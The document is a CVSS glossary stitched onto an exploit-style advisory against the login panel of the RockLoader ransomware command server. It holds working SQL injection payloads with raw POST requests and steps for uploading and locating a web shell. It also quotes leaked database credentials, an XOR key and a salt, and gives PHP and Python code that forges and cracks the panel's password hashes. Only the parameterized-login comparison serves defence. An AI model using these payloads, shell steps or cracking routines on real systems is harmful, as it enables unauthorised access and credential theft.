Attack Vector
Network
AV
The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system; a locally authenticated attacker executes code to elevate privileges.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
RockLoader Sql Injection Shell Upload
========================================
[!] Exploit Title: RockLoader Sql Injection Shell Upload
[!] Exploit Author: Dyar Sahdi
[!] Home Page: http://www.facebook.com/Dyar.Sahdi.Linux
[!] Contact Me in Email: [email protected]
=========================================
# Platform : PHP / WebApp
+ Cat/Tag : Shell / File Upload , Auth Bypassing , Multiple
----------------------------------------------------------------------------
1. Description
For the last few days a new Bart (aka RockLoader) malware/ransomware spreader
has been active.
My family was a victim of this type of extortion last year.
2. Short info: SQL Injections
NO user registration required.
The Command and Control server that processes the spread requests and user
tasks, and is responsible for the whole process, suffers from multiple remote
SQL injections.
The common C&C server path is "/cp/login/" in most setups.
Given the specifics of the spreader, its functionality, its encryption
methods and its working process, there is the possibility of RCE, MSF/CMD
injection and local root post-exploitation.
In common cases the setup comes with these specific configs:
- the user has full privileges on the host's SQL server.
- you can interact with local file read in most conditions.
- the user is the database administrator in most conditions.
- database name and structure are identical everywhere, since it ships as a
phpMyAdmin dump.
- file write and read is a must.
- user screen capture plugin on advanced setups.
- default database name is 'appdater'.
3. Proof of Concept:
Affected parameters are "username" and "password" via a specific POST
request.
The third parameter is the PHP session (the PHPSESSID cookie in the
requests below).
----=(SQL Injection 1)=----
Type: error-based
Method: POST
Request Type: XMLHttpRequest
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload example for POST parameter username:
password=S0M3PaSSw0rd&username=-1' OR 32 AND ROW(9213,8915)>(SELECT
COUNT(*),CONCAT(0x716a707071,(SELECT
(ELT(9213=9213,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM (SELECT 4118
UNION SELECT 5903 UNION SELECT 7493 UNION SELECT 1139)a GROUP BY x)--
KSxg1=6 AND 000580=000580 --
Example raw request for host: 127.0.0.1 (the payload above is
form-URL-encoded and substituted for the username value in the body)
-----------------EXAMPLE--------------------
POST /cp/login/ HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/cp/login/
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=S0M3PaSSw0rd&username=d0na1DTrump
-----------------END--------------------
=================================================================================================================================================================
POC:
----=(SQL Injection 2)=----
Type: AND/OR time-based blind
Method: POST
Request Type: XMLHttpRequest
Title: MySQL >= 5.0.12 AND time-based blind
Payload example for POST parameter username:
password=S0M3PaSSw0rd&username=-1' OR 32 AND SLEEP(5)-- sWMh1=6 AND
000580=000580 --
Example raw request for host: 127.0.0.1 (the payload above is
form-URL-encoded and substituted for the username value in the body)
-----------------EXAMPLE--------------------
POST /cp/login/ HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/cp/login/
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=S0M3PaSSw0rd&username=d0na1DTrump
-----------------END--------------------
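Added example (not the RockLoader panel's code, which is not on this page): a login check built by string concatenation next to the parameterized form, to show why the two /cp/login/ injections above work and what closes them. The `user` table, the query shape, the demo credentials and the generic `-1' OR 1=1 -- ` bypass are assumptions; SQLite stands in for MySQL, so the MySQL-only FLOOR/RAND and SLEEP() payloads from the advisory are replaced by a plain bypass and an unbalanced-quote error probe. The body builder shows the form-URL-encoding the raw requests need, which the bare payload strings above omit.

```python
"""Vulnerable vs. parameterized login for the /cp/login/ injection (added
illustration; table layout, query and credentials are assumptions)."""
import sqlite3
from urllib.parse import urlencode

# Assumed generic bypass: closes the username literal, ORs in a true
# condition, and comments out the password check.
BYPASS = "-1' OR 1=1 -- "


def make_db():
    """Constructed in-memory stand-in for the 'appdater' database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    conn.execute("INSERT INTO user (username, password) "
                 "VALUES ('admin', 'S0M3PaSSw0rd')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """User input spliced straight into the statement: the bug class the
    advisory's payloads exploit."""
    sql = (f"SELECT id FROM user WHERE username='{username}' "
           f"AND password='{password}'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Same check with bound parameters; the quote and comment in a
    payload are data, never SQL."""
    sql = "SELECT id FROM user WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def quote_probe_errors(conn, username):
    """Error-based oracle (the idea behind 'SQL Injection 1'): True when
    an unbalanced quote breaks the statement, i.e. the input reaches the
    SQL parser unescaped."""
    try:
        login_vulnerable(conn, username, "x")
    except sqlite3.Error:
        return True
    return False


def build_login_body(username, password):
    """Form-URL-encoded POST body matching the Content-Type of the raw
    requests; quotes, spaces and '=' in a payload must be encoded."""
    return urlencode({"password": password, "username": username})


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass:   ", login_vulnerable(db, BYPASS, "anything"))
    print("parameterized, bypass:", login_parameterized(db, BYPASS, "anything"))
    print("quote probe errors:   ", quote_probe_errors(db, "-1'"))
    print("request body:         ", build_login_body(BYPASS, "S0M3PaSSw0rd"))
```

The time-based variant ('SQL Injection 2') is the same parser reach measured with a delay instead of an error; on the real MySQL backend the fix is identical, bound parameters (or prepared statements in PDO/mysqli) for both `username` and `password`.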
=================================================================================================================================================================
POC:
----=(Shell Upload POC)=----
Requirements:
- Valid user for control panel.
- Access to database for reading.
Step1:
Upload your shell as new file via Control Panel.
Name it: OWNED
Note: filename is masked in control panel
Step2:
See 'file' table at 'appdater' database.
QUERY: SELECT * FROM `file`;
Look for name=OWNED and the corresponding file_path name (EXAMPLE:
C932kc.php)
Step3:
Location of your Shell
http://127.0.0.1/files/c932kc.php
-----------------END--------------------
=================================================================================================================================================================
POC:
----=(Database user and password disclose)=----
Example request to get the directory location (path disclosure through a
PHP notice when error reporting is on):
===============================================
POST /cp/login/ HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/cp/login/
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=S0M3PaSSw0rd&username=d0na1DTrump
===============================================
Response if error reporting is enabled:
<br />
<b>Notice</b>: A session had already been started - ignoring
session_start() in <b>/var/www/html/cp/login/auth.php</b> on line
<b>23</b><br />
===============================================
Read the settings.php file of the control panel to obtain the user and
password for the database.
location: /var/www/html/cp/settings.php
----Snip-----
<?php
//Debug
ini_set('error_reporting', E_ALL); // REMOVE TO TURN DEBUG OFF
ini_set('display_errors', 1); // REMOVE TO TURN DEBUG OFF
//MySQL settings
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', '');
define('DB_DATABASE', 'appdater'); <- most of the time this is the
default database, since it comes in the bundle.
define('DB_PORT', '3307');
......
---EndSnip---
=================================================================================================================================================================
POC:
----=(XOR Encryption key and password salt disclosure)=----
Read the settings.php file (/var/www/appdater/html/settings.php)
Look at the global configuration for the app.
----Snip-----
//GLOBAL settings
define('XOR_KEY', 'aWL~jH9zJl$5Yfz7'); <- File encryption XOR_KEY
define('FILES_URL', 'https://summerr554fox.su/files/'); <- address of
all uploaded files
define('APPDATER_PATH', '/var/www/html/');
define('SALT', 'KsqwGzTl?Qwq|oHA'); <- SALT KEY FOUND !
?>
---EndSnip---
TADAAAA: we have the password for the SQL server and even more: the
XOR_KEY for file encryption, the location of the EXE files, the PATH to
the Control Panel and,
most important of all --> THE SALT!
=================================================================================================================================================================
POC:
---=(Admin panel password generator)=---
Read the core/functions.php file
(/var/www/appdater/html/core/functions.php).
Look for this:
---Snip-----
function create_hash( $string ) {
return substr( sha1( SALT . $string ), 3, 17 );
}
----EndSnip---
TADAAAA: so we also have the algorithm used to create a valid user and
password hash.
<?php
// SALT recovered from settings.php (see above)
define('SALT', 'KsqwGzTl?Qwq|oHA');
// Same routine as core/functions.php: 17 hex chars of sha1(SALT . $string),
// starting at offset 3
function create_hash( $string ) {
return substr( sha1( SALT . $string ), 3, 17 );
}
// Prints the hash the panel stores for this password
echo create_hash('S0M3PaSSw0rd');
?>
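Added example for the two sections above (the XOR_KEY/SALT disclosure and the password generator); it is not code from the page or from the panel. It ports create_hash() exactly and shows what the leaked SALT buys an attacker: because the salt is one site-wide constant with no key stretching, a single dictionary pass tests every account's hash. The word list is constructed here. The XOR helper assumes a byte-wise repeating-key XOR with XOR_KEY, which the page does not state; treat it as a starting point for decoding files from FILES_URL, not as the spreader's confirmed scheme.

```python
"""create_hash() port plus dictionary attack with the leaked SALT, and a
repeating-key XOR helper for XOR_KEY (scheme assumed)."""
import hashlib
from itertools import cycle
from typing import Iterable, Optional

SALT = "KsqwGzTl?Qwq|oHA"         # from settings.php as quoted above
XOR_KEY = b"aWL~jH9zJl$5Yfz7"     # likewise


def create_hash(string: str) -> str:
    """Exact port of substr(sha1(SALT . $string), 3, 17): 17 hex chars
    starting at offset 3 of the SHA-1 hex digest (68 bits of hash)."""
    return hashlib.sha1((SALT + string).encode()).hexdigest()[3:20]


def crack(target: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack against one leaked hash. The same pass serves
    every account, since there is no per-user salt."""
    for pw in candidates:
        if create_hash(pw) == target:
            return pw
    return None


def xor_bytes(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR (assumed scheme); the same call encrypts and
    decrypts, and XOR-ing a run of zero bytes yields the key itself."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


if __name__ == "__main__":
    WORDLIST = ["password", "123456", "S0M3PaSSw0rd", "letmein"]  # constructed
    leaked = create_hash("S0M3PaSSw0rd")     # stands in for a hash read from the DB
    print(leaked, "->", crack(leaked, WORDLIST))
    blob = xor_bytes(b"MZ\x90\x00 stub", XOR_KEY)
    print(xor_bytes(blob, XOR_KEY))
```

Note that the truncation to 17 characters does not make the hash harder to crack; it only raises the (still negligible) chance of a collision, and the attacker needs no collision because the salt lets any candidate password be checked directly.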
===============================================